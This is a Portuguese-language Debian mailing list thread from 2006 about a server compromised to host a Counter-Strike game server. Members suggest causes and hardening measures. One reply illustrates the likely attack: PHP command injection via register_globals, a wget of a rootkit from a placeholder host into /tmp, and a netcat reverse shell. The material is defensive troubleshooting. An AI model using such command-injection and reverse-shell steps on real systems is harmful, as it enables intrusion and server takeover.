Jah rolou comigo tb... Eh dificil garantir a seguranca dos scripts (seja em qual linguagem for) uma vez que nao eh vc quem esta desenvolvendo.
Mas no caso em questao, eu ainda acho q pode ser um usuario da rede jogando em um server fora da sua rede e vc estah se confundindo hehehe Como vc disse soh existem poucas portas abertas... e as do CS nao estao entre elas. vc pode ver se tem o processo do CS rodando na maquina... se bem q se o cara entrou e conseguiu ateh subir um server de cs, ele poderia ter instalado um rootkit com um programa ps por ex, q nao liste os processos dem um user q ele tenha criado. Mas acho q nao eh este o caso. Abracos ----- Original Message ---- From: Sergio Lopes <[EMAIL PROTECTED]> To: Simon Rocher <[EMAIL PROTECTED]> Cc: [EMAIL PROTECTED]; Vinicius Andrade Marino <[EMAIL PROTECTED]>; debian-user-portuguese@lists.debian.org Sent: Monday, November 13, 2006 4:14:08 PM Subject: Re: Invasão... Cstrike Caros, No meu caso aconteceu o que o Simon explicou. O cara que configurou o servidor não acertou a parte de segurança permitindo que um usuario mal intencionado executasse um script. O pior que o cara foi dar uma de gostosão instalando o Slackware porque é bme seguro. Mas não adianta vc ter uma distribuição segura, mas vc não corrige as falhas. Eu aconselharia vc a refazer o servidor Abs, Sérgio On 11/13/06, Simon Rocher <[EMAIL PROTECTED]> wrote: > Varios sao os motivos: > > > > > Imagina o seguitne, um exemplo bemmmm besta, e bemmm looser, nunca faca isso > :) > > imagine q vc tem um php q execute uma chamada system > e o comando vem de um get ou de um post , e vc tem register_globals = on no > seu php.ini > > pronto, o cara pode ver este seu script e executar qq comando na sua > maquina... > > vamos supor ainda, q o cara executou um wget > http://ksjdaskljskla.com/rootkit.tar.gz pra dentro do seu dir /tmp > > depois descompactou, e rodou um netcat, ou um bot de IRC > > no caso com o netcat ele poderia estabelecer uma conexao com uma maquina dele > ex: > > MAQUINA DO CARA Seu servidor, saindo > com o netcat pra porta 80 do cara... > OUVINDO NA PORTA 80 <<<<<============ > COM O NETCAT > > > no caso acima o cara jah pega shell na maquina... mas vc ainda consegue ver > onde ele mandou seu server > se conectar para ele pegar a shell... > > > mas se o cara iniciou um bot de irc por ex na sua maquina, e este bot > se conecta a qq rede de irc, ele pode entrar na rede de irc e mandar comandos > pro seu server > atravez deste bot... > > > o que fazer pra evitar isso ? > sao varias as opcoes, depende da usabilidade q precisa: > 1- apt-get install bastille > Edite o script de firewall dele, e siga as instrucoes para habilitar o > controle > de saida do firewall. > Assim, se o cara tentar baixar algum arquivo ou fazer um fopen de um > stream ftp/http q seja, ele nao vai conseguir... > Habilitar isso eh BEEEEM chato, pois sempre q vc precisar fazer um include > de um stream precisa ter a regra no firewall do bastille, alem de ter q > colocar os ips da sua rede, de servers NTP, dos sources do debian etc. > > 2 - instale o mod_security e configure para as suas necessidades > ele jah vem com algumas regras q vc pode habilitar, distribuidas em 3 > nives de 'paranoia' > > 3 - aplique o patch do grsecurity no seu kernel, fica 'duca', vc sabe > absolutamente tdo q ocorre na maquina, e pode controlar > tdo com o PAX por ex. > > 4 - coloque algum auditor de arquivos (tripwire por ex) e grave o banco de > dados dele em um CD-R, para evitar q banco de dados dele seja alterado. > > 5 - seja rigoroso com as permissoes de arquivos > > 6 - desligue o register_globals do php.ini > > 7 - LIGUE o safe_mode do php.ini > > > isso tdo jah da um talento legal... > > as 3 ultimas sao as mais simples, e mais faceis de implementar. > > > abracos > > > > > ----- Original Message ---- > > From: "[EMAIL PROTECTED]" <[EMAIL PROTECTED]> > > To: Vinicius Andrade Marino <[EMAIL PROTECTED]> > > Cc: debian-user-portuguese@lists.debian.org > > Sent: Monday, November 13, 2006 4:19:21 PM > > Subject: Re:Invasão... Cstrike > > > > > > Opa! Fiquei curioso, não opiniei até agora por desconhecer alguma forma de > auxiliar, mas, pq o uso do PHP no WEBServer(Apache) pode permitir isto? O quê > deveria ser travado? > > > > Wagner Eduardo Bidin > > Credicard Banco S/A > > VP Controles Internos > > WPQA > > 55 11 3047.9089 > > [EMAIL PROTECTED] > > > > > > Vinicius Andrade Marino <[EMAIL PROTECTED]> 13/11/2006 13:47 > > To > > debian-user-portuguese@lists.debian.org cc > > > > Subject > > Re: Invasão... Cstrike > > > > > > > > > > > > > > Pelo o que pude notar o invasor conseguiu acesso por web ! > > apenas me diga isso... > > Qual aplicação roda no web-server ?(aposto que seria um php!) > > Qual versão do kernel está rodando atualmente ? > > E se caso lhe interesse passar as dores de cabeça faça assim: > > procure o log de acesso do apache e filtre o conteudo assim. > > cat access_log |grep cmd= |less > > logo descubrirá o conteudo e tente executar você mesmo ! > > > > > > > > Em Segunda 13 Novembro 2006 14:39, Paulo de Souza Lima escreveu: > > > É bão tb. :-) > > > > > > Paulo de Souza Lima > > > Curitiba/PR > > > Linux User 432358 > > > > > > ----- Mensagem original ---- > > > De: Anacleto Pavão <[EMAIL PROTECTED]> > > > Para: Paulo de Souza Lima <[EMAIL PROTECTED]>; Lista Debian > > > <debian-user-portuguese@lists.debian.org> Enviadas: Segunda-feira, 13 de > > > Novembro de 2006 11:29:20 > > > Assunto: Re: Invasão... Cstrike > > > > > > Nao seria interessante instalar e configurar o SNORT? > > > > > > Paulo de Souza Lima <[EMAIL PROTECTED]> escreveu: A maioria > > > das invasões são facilitadas por pessoas ou equipamentos dentro da empresa. > > > > > > Sugiro que você verifique se há algum desktop infectado, pois ele pode > > > estar monitorando a rede de alguma outra máquina. Outra boa idéia é fazer a > > > varredura pesada das portas de fora para dentro e de dentro para fora com o > > > nmap (de fora pra dentro você vai ter de pedir para alguém fazer). Também é > > > uma boa idéia copiar os logs para outra máquina. Outra coisa: vc tem > > > certeza de que sua rede não tem backdoors (como acessos adsl ou discados > > > que não passem pelo firewall, ou ainda, mais de um IP externo no firewall)? > > > > > > Me esclarece uma coisa: Ele instalou esse servidor de Counter Strike no > > > firewall ou num servidor interno à rede? > > > > > > Abraços, > > > > > > Paulo de Souza Lima > > > Curitiba/PR > > > Linux User 432358 > > > > > > ----- Mensagem original ---- > > > De: Daniel <[EMAIL PROTECTED]> > > > Para: Lista Debian <debian-user-portuguese@lists.debian.org> > > > Enviadas: Segunda-feira, 13 de Novembro de 2006 9:38:19 > > > Assunto: Invasão... Cstrike > > > > > > <!-- /* Style Definitions */ p.MsoNormal, li.MsoNormal, > > div.MsoNormal > > {margin:0cm;margin-bottom:.0001pt;font-size:12.0pt;font-family:"Times New > > Roman";}a:link, span.MsoHyperlink > > {color:blue;text-decoration:underline;}a:visited, span.MsoHyperlinkFollowed > > {color:purple;text-decoration:underline;} span.EstiloDeEmail17 > > {font-family:Arial;color:windowtext;}_filtered {margin:70.85pt 3.0cm > > 70.85pt 3.0cm;}div.Section1 {}--> Olá pessoal. > > > > > > Estou com um problema sério em minha rede. > > > Semana passada estava dando uma olhada nos logs como de costume e vi que > > > o log de saída estava enorme (2 Gb). Fui investigar e vi que alguém invadiu > > > o meu server e criou um servidor de jogo Counter Strike nele. O Engraçado é > > > que as únicas portas abertas de entrada são a 80 e uma de ssh alternativa. > > > > > > Bom, tentei vasculhar como o cara entrou, mas não encontrei nada. > > > Resolvi refazer o servidor todo. (2 dias de trabalho). Bom, voltei do final > > > de semana e lá estava tudo de novo. Não consigo entender como o cara > > > entrou, formatei a máquina, mudei as senhas, tem apenas as duas portas > > > abertas, mas ta tudo lá. O Login e root está desabilitado para ssh... > > > enfim, não sei o que o cara fez. E pra piorar, o desgraçado apagou os logs > > > todos. > > > > > > Alguém já passou por algo do tipo, com esses servers de counter strike? > > > Há algo padrão a se fazer? > > > Estou completamente perdido, qualquer dica, ajuda, sei lá, seria bem > > > vindo. > > > > > > Grato a todos > > > > > > Daniel > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > O Yahoo! está de cara nova. Venha conferir! > > > > > > > > > > > > Yahoo! Acesso Grátis - Internet rápida e grátis. Instale o discador agora! > > > > > > > > > > > > > > > > > > > > > > > > _______________________________________________________ > > > Novidade no Yahoo! Mail: receba alertas de novas mensagens no seu celular. > > > Registre seu aparelho agora! http://br.mobile.yahoo.com/mailalertas/ > > > > -- > > keepTec - Consultoria de Sistemas Linux - +55 (11)95002638 - [EMAIL > PROTECTED] > > > > > > > > > > > > > > > > > -- _ °v° Sérgio Lopes- Analista de Sistema /(_)\ São Paulo - SP - BRAZIL ^ ^ Linux user number 373166